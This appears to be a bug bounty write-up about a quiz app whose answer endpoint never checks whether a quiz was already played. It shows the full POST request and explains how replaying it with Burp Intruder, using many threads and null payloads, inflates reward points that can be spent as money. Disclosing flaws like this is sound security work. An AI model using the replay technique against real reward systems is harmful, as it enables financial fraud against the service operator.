Case Study
As this was a private program all illustrations of vulnerabilities will be represented with the host as example.com
The application is built to play Quiz and win reward points that can be used as money to play Quiz
example: 10 reward points = 1 Rs
to play a quiz you need to pay rs 5 or you can pay 50 reward points and so on. And while registering you get 50 reward points for 1st-time signup. Also, there are free quiz 1 per day where you can earn points.
example: 5 correct ans = 5 points, 10 correct ans = 10 points
minimum correct answer to get reward points is 5.
POC
let’s select a free quiz to earn some points so I managed to get 5 correct answers and awarded 5 points.
HTTP request that takes you answer
POST /endpoint HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.7
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
Cookie:
Upgrade-Insecure-Requests: 1
csrf_test_name=SOME_ID&contestId=MY_ID&stage=SOME_RANDOM_ID&timeTaken=[ARRAY,TO,COLLEECT,TIME ]&questionChoosen=[ ARRAY, OF , ANSWER, EXAMPLE, 1,2,2,3,4 ]&questionTime=["Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz"]&ans=onintercept the request and send this to intruder
now increase the threads to 25 and select NULL payload in intruder and the number of times you want the reward points to increase.
done.
There is no check whether the quiz is already played or not. They are just checking the number of right answers and awarding points.
queries ping
Twitter : https://twitter.com/wisdomfreak1
LinkedIn: https://www.linkedin.com/in/saddam-hussain-01766a148/
hello